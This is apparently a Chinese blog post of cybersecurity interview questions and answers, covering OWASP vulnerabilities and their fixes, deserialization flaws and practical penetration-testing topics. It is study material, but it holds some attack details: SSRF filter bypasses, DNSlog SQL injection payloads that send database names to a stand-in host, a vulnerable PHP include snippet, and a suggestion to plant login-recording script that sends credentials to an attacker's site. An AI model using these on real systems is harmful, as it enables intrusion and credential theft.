网络安全面试题目及总结

最新推荐文章于 2024-06-26 16:39:31 发布

mFcoder187974305

最新推荐文章于 2024-06-26 16:39:31 发布

阅读量1.5k

点赞数 33

分类专栏：网络安全学习专栏文章标签：网路安全

本文链接：https://blog.csdn.net/Runnymmede/article/details/139529744

版权

网络安全学习专栏专栏收录该内容

6 篇文章 0 订阅

订阅专栏

网络安全面试题目

Web安全

OWASP TOP10

1.SQL注入

介绍： SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中通过恶意构造请求参数，从而改变事先定义好的SQL语句行为的漏洞。可以在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意增删改查操作。
原理：在数据交互中，前端的数据传入到后台处理时，由于后端没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。
种类：
- 根据参数类型分为:字符，数字;
- 根据注入类型分为：联合（Union），布尔（Boolean），报错（Error），延迟（Time），堆叠（Stack），宽字节，二次，XFF（X-Forwarded-For），带外（OOB，out of band）等。
修复：字符转义，正则表达式过滤，使用预编译，PHP的PDO，开启魔术引号（magic_quotes_gpc），加装WAF、IDS、IPS等。
预编译原理：预编译将一次查询通过两次交互完成，第一次交互发送查询语句的模板，由后端的SQL引擎进行解析为AST或Opcode，第二次交互发送数据，代入AST或Opcode中执行，无论后续向模板传入什么参数，这些参数仅仅被当成字符串进行查询处理，因此杜绝了sql注入的产生。

2.跨站点脚本攻击（XSS）漏洞

原理：XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
种类：存储型，反射型，DOM型
区别：存储型:常出现在信息修改添加等地方，导致恶意代码被存储在数据库中，每当被攻击者访问到后就会触发执行；反射型：常出现在url中，一般需要攻击者提前构造好恶意链接，欺骗用户点击，触发攻击代码；DOM型：攻击代码在url中，然后输出在了浏览器的DOM节点中。简单比较会发现，存储和反射都经过服务器，而DOM是纯前端。
修复：对输入数据进行Html Encode 处理，白名单过滤，过滤JavaScript 事件的标签，开启http-only，装WAF等。

3.XXE漏洞

原理：XXE（XML外部实体注入）漏洞是一种利用XML解析器存在问题的安全漏洞，攻击者可以通过将恶意数据注入到XML文件中并发送给应用程序进行解析，从而执行恶意代码或者读取服务器上的敏感数据。主要原因是开发者没有对XML数据进行充分的校验和过滤。
修复：
- 使用语言中推荐的禁用外部实体的方法
  - PHP：libxml_disable_entity_loader(true);
  - Java:
    - DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
    - dbf.setExpandEntityReferences(false);
  - Python:
    - from lxml import etree
    - xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
- 手动黑名单过滤
  - 过滤 XML 中的相关关键词，比如：<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC 等。

4.服务器端请求伪造（SSRF）漏洞

原理：攻击者能够通过伪装成终端用户或服务器自身，将恶意数据发送到目标网站内部网络，以达到读取敏感信息、窃取密码等危害。
种类：参数污染型SSRF、基于缺陷的SSRF、反射性SSRF。
修复：

①输入验证：对于所有从客户端输入的数据，包括URL、表单和HTTP头字段，都要进行验证和过滤，删除不必要的字符和空格，并限制输入长度。
②明确白名单：建立一个明确的白名单，只允许应用程序访问合法的资源。例如，定义一个URL库，在应用程序中仅允许访问这个库中的URL。
③限制重定向：使用HTTP响应头来限制服务器的重定向行为，避免恶意重定向导致的SSRF风险。
④检测远程地址：应用程序应该检测所有远程URLs和IP地址，以确保它们指向预期的目标并且可信。
⑤安全配置：安全地配置服务器和其他基础设施，包括对端口、协议和代理服务器的限制，以减少攻击表面。

5.跨站点请求伪造（CSRF）漏洞

原理：CSRF（跨站点请求伪造）漏洞是一种利用受害者已经登录了某个网站的身份认证信息这一事实进行攻击的手段。攻击者通过构造一个特制的请求，诱导受害者在该网站上访问并执行该请求，从而实现攻击目的。
种类：CSRF漏洞可以分为get型、post型和jsonp型三种类型。其中，get型攻击主要利用图片、链接等标签的src属性来触发，post型则是提交表单或请求，jsonp型则是利用JSONP跨域特性进行攻击。
修复：防止CSRF漏洞的方法主要有Token验证、Referer验证、使用验证码、同源检测和限制Cookie作用域等。具体来说，建议在表单和请求中加入随机生成的Token值，并在服务器端对Token进行验证；使用Referer验证来判断请求是否来源于本站；使用验证码来防止自动化攻击；限制Cookie的作用域，使其仅在必要的URL路径下生效；检查并确保应用程序不会直接响应用户提交的数据等。

6.跨域资源共享（CORS）漏洞

原理：CORS（跨域资源共享）漏洞是一种利用浏览器的同源策略存在缺陷的安全漏洞。攻击者可以通过恶意网站或者其他方式来访问受害者的敏感数据。攻击者利用CORS的特性绕过浏览器的同源策略，从而造成对目标网站的攻击。
种类：CORS漏洞可以分为简单请求和非简单请求两种类型。简单请求是指使用HTTP方法为GET、HEAD、POST，并且只使用了以下Content-Type值之一的请求：text/plain、multipart/form-data 或 application/x-www-form-urlencoded。非简单请求则是不符合以上条件的请求。
区别：简单请求的跨域请求会先发一个预检请求OPTIONS，然后再发送正式请求，而非简单请求则不会发出预检请求OPTIONS，直接发起正式请求。这也是两者最显著的区别。
修复：防止CORS漏洞的方法主要有限制Access-Control-Allow-Origin、使用Token验证和Referer白名单等。具体来说，建议在服务器端进行设置，禁止跨域访问；尽量避免使用Cookie作为认证凭据，而是使用Token验证；对Referer进行白名单限制，只允许指定来源的请求通过。此外，还可以使用CSRF Token来防御相关攻击，以及保证应用程序本身的安全性。

7.远程执行代码（RCE）漏洞

原理：远程执行代码（RCE）漏洞是指攻击者通过在应用程序中注入恶意代码来控制服务器上的操作系统。攻击者通常会利用该漏洞来获取敏感数据、篡改文件、植入后门等。
修复：防止RCE漏洞的方法主要有代码审计、输入验证、参数化查询、使用安全的API、限制文件权限等。具体来说，建议开发人员对所有的输入变量进行严格的输入验证和类型检查；不信任用户输入，避免拼接字符串来生成代码或者SQL语句；使用安全的API，如paramiko库实现SSH连接而不是使用os.system函数；限制应用程序的文件权限，禁止其访问敏感目录和文件等。此外，还可以使用沙箱技术对应用程序进行隔离，以降低攻击者对系统的危害。

8.越权漏洞（IDOR）漏洞

原理：越权漏洞原理主要是由于应用程序没有正确限制用户的访问权限，导致攻击者能够直接访问受保护的资源或数据。
种类：水平越权、垂直越权
区别：
- 水平越权漏洞发生在同一等级的用户之间。攻击者通过利用系统缺陷或者漏洞，绕过访问控制，获取到其他同级别用户的权限。例如，一个普通用户能够通过修改 URL 参数，访问到另一个普通用户的个人信息，包括用户名、密码等敏感信息。
- 垂直越权漏洞发生在不同等级的用户之间。攻击者通过利用系统缺陷或者漏洞，从低级别的用户处获取到高级别用户的权限。例如，一个普通用户能够通过修改数据表中的参数，获取到管理员账号的权限。
修复：对于水平越权漏洞，需要加强用户身份验证和访问控制，确保每个用户只能访问其具有权限的资源。而对于垂直越权漏洞，需要加强数据完整性的检查，限制低级别用户能够修改或操作的数据范围，并且限制低级别用户能够执行的操作。

9.未授权访问漏洞

原理：未授权访问漏洞是指攻击者在无需任何授权或认证的情况下，通过某种手段直接访问到了系统中的敏感信息或操作权限。这种漏洞通常是由于系统配置不当、权限设置不正确或者代码实现缺陷等原因导致。
种类：
- 目录遍历漏洞：攻击者通过修改 URL 参数或其他方式，访问系统中的未授权目录或文件。
- 功能级别访问控制漏洞：攻击者通过更改请求参数或者直接访问某些页面，绕过原本需要进行授权才能访问的功能模块。这种漏洞通常出现在 Web 应用程序中的管理员后台或其他需要特定权限的地方。
区别：目录遍历漏洞主要是通过对访问路径的修改来实现非法访问，而功能级别访问控制漏洞则是通过对访问条件的修改来实现非法访问。目录遍历漏洞属于文件系统的问题，而功能级别访问控制漏洞则属于应用逻辑的问题。
修复：
- 实施严格的身份认证和访问控制机制，只有经过身份认证和授权的用户才能访问受保护的资源。
- 对所有访问进行审计，包括成功和失败的访问，以便检测异常的行为并追踪行为来源。
- 对所有调用接口的参数进行有效性验证，确保输入的参数符合预期类型、长度、范围等条件。
- 在应用程序中限制用户能够访问的内容和功能，并禁止跨站点请求伪造 (CSRF) 攻击。
- 定期检查和更新应用程序或系统的安全策略和配置，以确保其与最佳实践相符，并防止任何已知的漏洞或攻击向量。
典型：
- Redis 未授权访问漏洞
未开启认证，导致可以直接连接到数据库，然后在攻击机中生成ssh公钥和私钥，密码设置为空，然后将生成的公钥写入，再利用私钥连接。
- JBOSS 未授权访问漏洞
访问ip/jmx-console 就可以浏览jboss 的部署管理的信息面板，不需要输入用户名和密码可以直接部署上传木马。简单来说就是对某些页面的验证不严格导致绕过了用户验证的环节，使其可以直接访问到某些登录后才能访问到的页面。

10.逻辑漏洞

原理：逻辑漏洞是指攻击者利用系统内部的逻辑错误或疏漏，绕过了安全机制，达到访问敏感信息、执行未授权操作等目的。与其他漏洞不同，逻辑漏洞不依赖于技术性的缺陷，而是在业务逻辑上存在漏洞。
种类：支付漏洞、越权访问、越权操作、权限提升、重放攻击等。
区别：支付漏洞指攻击者通过修改订单金额、篡改请求等方式绕过支付系统的检查，实现非法获利；越权访问是指攻击者获取到其他用户的权限并进行了一些未授权的操作；越权操作则是攻击者将自己的权限提高至超级用户或管理员的权限，从而对系统进行恶意操作；权限提升漏洞是指攻击者针对系统中存在的权限设计问题或代码实现缺陷，成功地将低权限的账号的权限提升至高权限状态。而重放攻击则是攻击者通过重复发送已经获取到的合法请求，来达到冒充他人或者执行某个异常操作的目的。
修复：由于逻辑漏洞涉及到系统业务逻辑的问题，因此要修复此类漏洞需要对业务逻辑进行全面的审查和测试，发现并纠正其中的逻辑错误。同时，对于一些常见的逻辑错误，也可以采取一些相应的对策，比如：对于支付漏洞，需要加强参数校验，使用严谨的算法保护数据的完整性；对于越权访问和操作漏洞，则需要增强访问控制策略，对重要操作进行多重身份验证等；对于权限提升漏洞，需要加强权限管理，遵守最小特权原则；对于重放攻击则可以使用防止重放攻击的技术手段来防范。

11.弱口令漏洞

原理：弱口令漏洞是指攻击者通过猜测或暴力破解的方式获取到系统中账号密码等敏感信息，从而登陆系统进行非法操作或窃取数据等行为。这种漏洞通常是由于用户在设置密码时过于简单、使用默认密码等不安全行为导致。
修复：针对弱口令漏洞，可以采取以下措施：强制要求用户设置密码强度，比如长度、复杂度和特殊符号等；禁止使用默认密码和弱口令，如禁止使用生日、电话号码、连续数字等；加强密码的存储和传输安全，如采用哈希算法、加盐机制等方式保护用户密码；启用多重身份验证机制，增加破解难度；定期检查和更新密码等。同时，企业也可以借助第三方漏洞扫描工具，及时发现系统中存在的弱口令漏洞，并及时加以修复。

12.Oauth认证缺陷漏洞

原理：OAuth认证缺陷漏洞是指攻击者通过对OAuth认证流程中的某些环节进行攻击，从而获取到用户授权信息、窃取用户隐私等行为。常见的OAuth认证缺陷主要包括CSRF攻击、重定向攻击、Token泄露等。
种类：CSRF攻击、重定向攻击、Token泄露等。
区别：CSRF攻击是利用被攻击用户身份发起攻击，类似于冒充用户发起恶意请求；重定向攻击则是攻击者构造了一个URL链接，欺骗用户访问该链接进而获取到授权码或令牌；Token泄露则是攻击者通过各种手段窃取到访问令牌，进而以该令牌的权限进行非法操作。
修复：针对OAuth认证缺陷漏洞，可以采取以下措施：加强认证流程中的安全策略，比如增加验证码验证、多重身份验证等方式来提高身份认证的安全性；使用HTTPS协议加密传输认证信息，防止信息被窃取或篡改；采用高强度加密算法对令牌进行加密处理，保证令牌的安全性；合理设计授权范围，避免过度授权，限制授权时间和权限的范围；对于可能受到攻击的接口实现，需要增加防护机制，禁止恶意访问等。同时，开发人员还需关注OAuth认证工具本身的安全性问题，及时更新OAuth工具版本，防范已知的漏洞风险。

13.重定向漏洞

原理：重定向漏洞是指攻击者利用系统中的某些URL跳转功能，欺骗用户点击恶意链接，将其跳转到攻击者构造的恶意网站上，从而进行钓鱼、窃取用户信息等行为。通常情况下，攻击者会通过修改URL参数或者构造伪造的URL来实现目的。
修复：针对重定向漏洞，可以采取以下措施：限制跳转URL的范围，只允许跳转到特定的站点，避免被攻击者利用；增加双因素验证等安全机制，防止攻击者轻易欺骗用户；对于可能被篡改的URL参数进行校验，避免被篡改；使用合适的编程语言和框架，如.NET MVC、Spring MVC等，自带了对重定向安全的检查，直接调用即可；对于涉及到跳转的功能，尽量使用POST请求，避免GET请求中暴露URL参数的风险；同时，企业还可以采用WAF等安全设备，对可能存在的重定向漏洞进行监测和拦截。

14.jsonp漏洞

原理：JSONP漏洞是指攻击者在Web应用程序中利用JSONP(JSON with Padding)回调函数的机制，通过操纵JSONP请求，在受害者浏览器中执行恶意JavaScript代码，从而进行XSS攻击、窃取用户信息等行为。攻击者通常会伪造一个带有攻击代码的JSONP响应，并将其发送给目标站点。
种类：反射型JSONP漏洞、存储型JSONP漏洞等。
区别：反射型JSONP漏洞是指攻击者构造一次含有恶意回调函数的URL，欺骗用户点击该URL，使得攻击者收到回调函数数据并执行恶意操作；存储型JSONP漏洞则是攻击者将含有恶意回调函数的代码存入数据库中，当用户使用服务时恶意代码被执行。
修复：针对JSONP漏洞，可以采取以下措施：加强输入参数校验，避免恶意代码被注入；限制JSONP请求的来源，即只接受来自可信任源的请求；使用CSP(Content Security Policy)技术，限制网页中可信任的资源来源；定期更新服务端程序，及时修补已知漏洞或问题。此外，企业也可以借助第三方漏洞扫描工具，对系统中存在的JSONP漏洞进行检测和修复。同时，开发人员还应当注重安全编码规范，合理设计回调函数和请求方式，并加强团队内部的安全意识和管理。

15.文件操作漏洞

原理：文件操作漏洞是指攻击者通过恶意构造的文件操作语句，绕过系统的安全限制，对系统中的文件进行非法读写、删除和修改等行为，从而导致系统脆弱性和安全风险。常见的文件操作漏洞包括目录遍历漏洞、文件上传漏洞、文件包含漏洞等。
种类：目录遍历漏洞、文件上传漏洞、文件包含漏洞等。
区别：目录遍历漏洞是指攻击者通过构造恶意路径名，突破文件访问的限制，直接读取或执行系统中其他目录下的文件；文件上传漏洞则是攻击者在Web应用程序中上传恶意文件，从而实现远程控制、窃取目标数据等目的；文件包含漏洞是指攻击者通过操纵PHP的include()函数，将恶意代码注入到被引入的文件中，进而执行恶意操作。
修复：防范文件操作漏洞需要加强对文件操作的权限和安全性管理，包括以下措施：对于所有用户上传的文件，必须进行严格的类型和大小验证，并且不允许上传可执行文件等危险文件；对于系统中的重要文件，需要对其访问权限进行设置，只开放必要的权限，并及时备份数据；对于可能存在遍历漏洞的文件路径，需要提前做好访问限制，尽可能采用白名单机制来控制文件访问；对于动态页面中包含的文件，需要使用绝对路径而不是相对路径，同时禁止使用用户输入数据作为动态页面中包含的文件路径等。此外，企业还可以借助WAF等安全设备，对系统中可能存在的文件操作漏洞进行监测和拦截。

16.条件竞争漏洞

原理：条件竞争漏洞是指在多线程环境下，当两个或多个线程同时访问同一资源时，由于代码执行的先后顺序不确定，导致程序出现非预期的行为和结果。通常情况下，攻击者会利用这种竞争条件来实现未授权访问、远程命令执行等恶意操作。
种类：文件竞争漏洞、时间竞争漏洞等。
区别：文件竞争漏洞主要发生在多个进程同时读写同一个文件时，从而出现数据丢失、覆盖等问题；时间竞争漏洞则是攻击者利用程序中的定时器等机制，快速执行一些敏感操作，突破系统的安全限制。
修复：针对条件竞争漏洞，可以采取以下措施：对于共享变量或者资源，需要采用锁等机制保证同步访问；注意避免出现死锁等问题；对于需要调用系统函数或者外部API的操作，需要先判断其返回值，并做好适当的错误处理；尽可能减少共享内存区域，在多线程之间使用消息队列等机制进行信息交换；对于可能存在时间竞争漏洞的程序代码，需要加入合适的延时调用和异常处理，避免程序出错等情况。此外，企业还应该进行安全编码规范和安全测试，及时发现并修补程序中存在的条件竞争漏洞。

17.并发漏洞

web白盒漏洞问题

1.JAVA反序列化了解吗？有没有了解过shrio反序列化？

Java中的ObjectOutputStream类的writeObject()方法可以实现序列化，其作用把对象转换成字节流，便于保存或者传输，而ObjectInputStream类的readObject()方法用于反序列化，作用就是把字节流还原成对象。shiro反序列化主要是Apache shiro提供了一个remember的一个功能，用户登录成功后会生成经过加密并编码的cookie，保存在浏览器中方便用户的日常使用，而服务器对cookie的处理流程就是先获取浏览器上保存的cookie，然后将其bs64解码，再进行AES解密，再将其反序列化进行校验，而漏洞就是出现在这里，我们都知道AES它是一个硬编码，他是有默认密钥的，如果程序员没有去修改或者过于简单，那我们就可以进行cookie重构，先构造我们的恶意代码，然后将恶意代码进行序列化，然后AES加密(密钥我们已经爆破出来了)，再进行bs64编码，形成我们新的cookie，而服务器在处理时就会按照刚才的处理流程，就会在服务端触发我们构造的恶意代码。

2.PHP反序列化有了解吗？

序列化就是将一个对象转换成字符串，反序列化则反之，将字符串重新转化为对象。此外，PHP反序列化又可以简单分成两种，一种无类，一种有类，无类利用就略微简单，如果源码会将输入的值进行反序列化，那我们就需要提前将数据序列化后再传入。而想要利用有类就要用到魔术方法，而魔术方法就像一个潜规则一样，例如我们在创建对象时，就会触发 construct(),并执行 construct()中的代码。

3.fastjson漏洞利用原理？

在请求包里面中发送恶意的json格式payload，漏洞在处理json对象的时候，没有对@type字段进行过滤，从而导致攻击者可以传入恶意的TemplatesImpl类，而这个类有一个字段就是 _bytecodes ，有部分函数会根据这个 _bytecodes 生成java实例，这就达到fastjson通过字段传入一个类，再通过这个类被生成时执行构造函数。

4.PHP代码执行的危险函数？PHP命令执行函数？

PHP 代码执行的危险函数：call_user_func()、call_user_func_array()、create_function()、array_map()
PHP 命令执行函数：system()、shell_exec()、passthru()、exec()、popen()、proc_open()、putenv()

5.phar协议如何利用，php伪协议input与post数据包发送有什么区别？

可以Bypass一些waf，绕过上传限制
Phar反序列化，Phar:// 伪协议读取phar文件时，会反序列化meta-data储存
区别
- application/x-www-form-urlencoded 或multipart/form-data时，php://input 中是原始数据。 $_POST 中是关联数组，且没有上传控件的内容。
- enctype=“multipart/form-data” 时php://input 是无效的。
- Content-Type = "text/plain"时，$_POST 不能获取post的数据，php://input可以。

** Fastjson、Log4j常见漏洞原理？如何彻底解决该漏洞？

思路：彻底解决该漏洞可以分析根因，Fastjson主要因为Autotype导致的、Log4j主要因为Lookup，可考虑移除经常出现问题的代码，制作内部精简定制版本。或者通过应用运行时防护（RASP）。

web组件端口漏洞问题

1.常见的中间件漏洞知道哪些？

IIS：PUT漏洞、短文件名猜解、远程代码执行、解析漏洞等
Apache：解析漏洞、目录遍历等
Nginx:文件解析、目录遍历、CRLF注入、目录穿越等
Tomcat:远程代码执行、war后门文件部署等
JBoss:反序列化漏洞、war后门文件部署等
WebLogic:反序列化漏洞、SSRF任意文件上传、war后门文件部署等

2.未授权访问你可以简单说说吗

Redis 未授权访问漏洞

未开启认证，导致可以直接连接到数据库，然后在攻击机中生成ssh公钥和私钥，密码设置为空，然后将生成的公钥写入，再利用私钥连接。

JBOSS 未授权访问漏洞

访问ip/jmx-console 就可以浏览jboss 的部署管理的信息面板，不需要输入用户名和密码可以直接部署上传木马。简单来说就是对某些页面的验证不严格导致绕过了用户验证的环节，使其可以直接访问到某些登录后才能访问到的页面。

3.weblogic权限绕过？

通过静态资源来绕过权限验证，防止被重定向到登陆界面。
通过请求.portal ，控制处理的Servlet 是渲染UI 的MBeanUtilsInitSingleFileServlet 。
通过编码后的…/ ，让最终渲染的模版是console.portal。

web基础实战问题

1.逻辑漏洞遇到过哪些，给你登录框有没有什么思路？

常见逻辑漏洞：越权，响应包修改，支付金额修改，cookie爆破，密码找回方面等等
登录页面思路：爆破，session覆盖，sql注入，xss，任意用户注册，js文件查看敏感信息，短信轰炸，万能密码，二次注入，模板注入等等

2.CDN和DNS区别？CDN绕过思路？

CDN：内容分发网络，主要作用就是让用户就近访问网络资源，提高响应速度，降低网络拥堵。
DNS:域名服务器，主要作用就是将域名翻译成ip地址。
CDN绕过思路：子域名，内部邮件，黑暗引擎搜索，国外ping，证书及DNS查询，app抓包，配置不当泄露，扫全网，DOS攻击等。

3.命令无回显如何解决？

无回显：延时判断，http请求监听，DNSlog利用，写入当前目录下载查看等等。

4.3389端口无法连接的几种情况？

1.3389关闭状态

2.端口修改

3.防火墙连接

4.处于内网环境

5.超过了服务器最大连接数

6.管理员设置权限，指定用户登录

5.常问的端口信息？

21：FTP文件传输协议
22：SSH远程连接
23:TELNET远程登录
25:SMTP邮件服务
53:DNS域名系统
80：HTTP超文本传输协议
443：HTTPS安全超文本传输协议
1433：MSSQL
3306：MYSQL
3389：windows远程桌面服务端口
7701：weblogic
8080：TCP,HTTP协议代理服务器：Apache-tomcat默认端口号

6.渗透测试的流程？

单一网站：先判断有无CDN，有先找真实ip，无的话扫扫旁站，c段，此外识别CMS，看看使用什么中间件，插件，系统等等，再对其进行端口探测，目录扫描，查看网站的js文件，看看有没有敏感信息泄露，找找看看有没有app，公众号之类的等等扩大资产面，然后对收集到的信息进行常规的漏洞探测
网段或区域：使用goby工具对资产进行一个批量的扫描，批量打点，然后对可能存在漏洞的薄弱点进行漏洞探测

7.打点一般会用什么漏洞？

优先以java反序列化这些漏洞像shiro，fastjson，weblogic，用友oa等等进行打点，随后再找其他脆弱性易打进去的点。因为javaweb程序运行都是以高权限有限运行，部分可能会降权。

8.SSRF禁用127.0.0.1后如何绕过，支持哪些协议？

(1) 利用进制转换

(2) 利用DNS解析

(3) 利用句号（127。0。0。1）

(4) 利用[::]（http://[::]:80/）；

(5) 利用@（http 😕/example.com@127.0.0.1）；

(6) 利用短地址（http 😕/dwz.cn/11SMa）；

(7) 协议（Dict://、SFTP://、TFTP://、LDAP://、Gopher://）

9.sqlmap自带脚本你知道哪些？

1、apostrophemask.py ：将引号替换为UTF-8,用于过滤单引号。

2、base64encode.py :替换为base64编码。

3、multiplespaces.py:围绕SQL关键字添加多个空格。

4、space2plus.py:用+号替换为空格。

10.了解过解析漏洞，分别有哪些？

IIS：
- 1、在网站目录.asp、.asa下的任何扩展名的文件格式都会被解析为asp并执行在目录.asp下，.txt文本文件被解析。
- 2、在IIS6.0上，分号; 后面的不解析。
nginx：
- 1、在网站目录下创建文件demo2.jpg，然后再浏览器中访问 http://192.168.11.131/test2/demo2.jpg/aaa.php服务器对请求的内容是从右向左的。Nginx拿到文件路径（更专业的说法是URI）/test.jpg/test.php后，一看后缀是.php，便认为该文件是php文件，转交给php去处理。php一看/test.jpg/test.php不存在，便删去最后的/test.php，又看/test.jpg存在，便把/test.jpg当成要执行的文件了，又因为后缀为.jpg，php认为这不是php文件，于是返回“Accessdenied.”。
- 2、00截断
apache
- Apache解析文件的时候是按照从右向左的方式，直到遇到自己能解析的脚本后缀

11.为何一个mysql数据库的站，只有一个80端口开放？

更改了端口，没有扫描出来。
站库分离。
3306端口不对外开放。

12.注入时可以不使用and或or或xor，直接order by开始注入吗？

and/or/xor，前面的1=1、1=2步骤只是为了判断是否为注入点，如果已经确定是注入点那就可以省那步骤去。

13.在有shell的情况下，如何使用xss实现对目标站的长久控制？

后台登录处加一段记录登录账号密码的js，并且判断是否登录成功，如果登录成功，就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。
在登录后才可以访问的文件中插入XSS脚本。

14.目标站无防护，上传图片可以正常访问，上传脚本格式访问则403什么原因？

这种情况很可能是因为目标站点对上传文件进行了格式限制。在上传文件时，服务器通常会检测文件类型和内容，并根据不同的文件类型采取不同的处理方式。如果上传的文件类型不在允许范围内，服务器可能会禁止访问该文件，返回403状态码。可以尝试改写后缀进行绕过。

15.access扫出后缀为asp的数据库文件，访问乱码。如何实现到本地利用？

迅雷下载，直接改后缀为.mdb。

16.文件包含Getshell思路？

通过PHP伪协议php://input写入一句话木马
通过PHP伪协议php://filter读取敏感文件

17.xss的防护方法有哪些呢？httponly绕过？

防护
- 输入过滤
- 纯前端渲染
- 转义HTML
绕过
- CVE-2012-0053。
- PHPINFO页面（如果目标网站存在PHPINFO页面，就可以通过XMLHttpRequest请求该页面获取Cookie信息（$_SERVER[“HTTP_COOKIE”]会打印出具有httponly属性的cookies））。
- iframe框架钓鱼（通过标签嵌入一个远程域，完全撑开后，以覆盖原有的页面）。跳转钓鱼（通过购买相似名，构建相同的钓鱼页面，使受害者跳转至钓鱼站）。
- 历史密码（通过js伪造登录表单，欺骗浏览器自动填入，由此获取浏览器记住的历史密码）。

18.你常用的渗透工具or漏扫工具？

渗透工具：msf，cs，nmap，slqmap，dirscan，burp等
漏扫：xray,awvs,nessus,appscan等

19.sqlmap中–os-shell的原理及利用条件？

利用条件：root权限，知道绝对路径，GPC关闭，Secure_file_priv参数为空或者为指定路径。
原理及流程：原理其他比较简单，先目标的一个基础信息的探测，然后上传shell到目标web网站上，利用shell传参进行命令执行，退出时删除shell。
当然数据库不同，必要条件也不同，例如sqlserver需要数据库支持外连，数据库权限为SA权限，主要利用xp_cmdshell扩展进行命令执行。
原理细致分析：https://xz.aliyun.com/t/7942#toc-4

20.对于信息收集你会使用哪些工具？具体用来干什么？

nmap：端口服务扫描，常见漏洞探测
dirsearch：目录信息扫描
whatwaf：waf检测识别
WFuzz：fuzz测试
潮汐指纹识别orwappalzer：cms及中间件等信息收集

21.市面上的几款webshell管理工具，他们的相同点和不同点？

相同点：都是webshell管理的工具，都采用的是C/S模型，上传的shell为S，个人客户端为C。
不同点：实现区别，功能差异，例如冰蝎有流量动态加密。

22.nmap常用参数，说一下？

参考文章：https://www.cnblogs.com/Vinson404/p/7784829.htm

23.如何手工判断对方操作系统？

修改url中参数，改成大写，正常为windows，不正常即为linux
ping服务器，返还得TTL值不一样，windows一般在100以上，linux一般是100以下。
查看数据包HTTP报头，如果是iis那就肯定是windows

24.Linux日志目录？

/var/log下

25.php的%00截断的原理是什么？

因为在C语言中字符串的结束标识符%00是结束符号，而PHP就是C写的，所以继承了C的特性，所以判断为%00是结束符号不会继续往后执行
条件：PHP<5.3.29，且GPC关闭。

26.php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？

if ($_GET['file']){
    include $_GET['file'];
}

包含的文件设置为变量，并且无过滤导致可以调用恶意文件还可以对远程文件包含，但需要开启allow_url_include = ON 通过测试参数的地方进行本地文件/etc/passwd等包含如何存在漏洞而且没有回显，有可能没有显示在页面而是在网页源代码中，除些可以利用DNSlog进行获取包含的信息。从index.php文件一级级往读取也可以利用PHP封装协议读取文件

27.sleep被禁用后还能怎么进行sql注入

BENCHMARK，Get_lock函数，当都被禁用后可以用计算量比较大的语句使数据库查询时间变长，从而达到延时注入的效果。 mysql：AND (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C);

28.XXE的危害？哪些地方容易存在xxe？xxe架构方面有没有了解过

xxe常见场景是如pdf在线解析、word在线解析、定制协议，留言板等，跟逻辑设计有关而与语言无关，最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用，至少要禁用DTD、Entity。 xxe危害读取本地文件，执行系统命令，探测内网端口，攻击内网服务探测内网端口的协议有gopher file dict，不同语言支持不同的协议，是具体情况而定 file http ftp是常用的
防范，python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml
客户端也可以有xxe攻击，有的网站会使用office打开docx进行解析 Java解析XML的常用三方库，如果不禁用DTD、Entity都会导致XXE漏洞：javax.xml.stream.XMLStreamReader;javax.xml.parsers.DocumentBuilderFactory;

29.信息收集如何处理子域名爆破的泛解析问题？

参考文章：https://blog.csdn.net/Chu_Jian_Xiong/article/details/127496889

30.输出到href的XSS如何防御？

参考文章：https://blog.csdn.net/m0_53008479/article/details/124487401

31.samesite防御CSRF的原理？

参考文章：https://blog.csdn.net/qq_26192391/article/details/116378150

32.phpmyadmin写sehll的方法？

常规导入shell的操作
一句话导出shell
日志备份获取shell

33.Sql注入无回显的情况下，利用DNSlog，mysql下利用什么构造代码？mssql下又如何？

没有回显的情况下，一般编写脚本，进行自动化注入。但与此同时，由于防火墙的存在，容易被封禁IP，可以尝试调整请求频率，有条件的使用代理池进行请求。
此时也可以使用DNSlog 注入，原理就是把服务器返回的结果放在域名中，然后读取DNS 解析时的日志，来获取想要的信息。
Mysql 中利用load_file() 构造payload： ’ and if((select load_file(concat(‘\’,(selectdatabase()),‘.xxx.cey e.io\abc’))),1,0)#
Mssql 下利用master…xp_dirtree 构造payload：DECLARE @ hostvarchar(1024);SELECT @ host=(SELECTdb_name())+‘.xxx.ceye.io’;EXEC(‘master…xp_dirtree"’+@host+‘\foobar$"’);

34.宽字节注入漏洞原理、利用方式及修复方案？

原理：在mysql中使用了gbk编码，占用2个字节,而mysql的一种特性,GBK是多字节编码，它认为两个字节就代表一个汉字，所以%df时候会和转义符\ %5c进行结合,所以单引号就逃逸了出来,当第一个字节的ascii码大于128，就可以了。
参考文章：

https://blog.csdn.net/weixin_41489908/article/details/108481665

https://www.cnblogs.com/zzjdbk/p/12984498.html

35.平常怎么去发现shiro漏洞的？

思路：登陆失败时候会返回rememberMe=deleteMe字段或者使用shiroScan被动扫描去发现
完整：未登陆的情况下，请求包的cookie中没有rememberMe字段，返回包setCookie里也没有deleteMe字段登陆失败的话，不管勾选RememberMe字段没有，返回包都会有rememberMe=deleteMe字段不勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段，还会有rememberMe字段，之后的所有请求中Cookie都会有rememberMe字段。

36.拿到webshell不出网情况下怎么办？

reg上传去正向连接。探测出网协议，如dns，icmp。

37.phpmyadmin写sehll的方法？

常规导入shell的操作
一句话导出shell
日志备份获取shell

38.ssrf怎么用redis写shell？

SSRF服务端请求伪造：
- 对内网扫描，获取banner
- 攻击运行在内网的应用，主要是使用GET参数就可以实现的攻击（比如Struts2，sqli 等）。
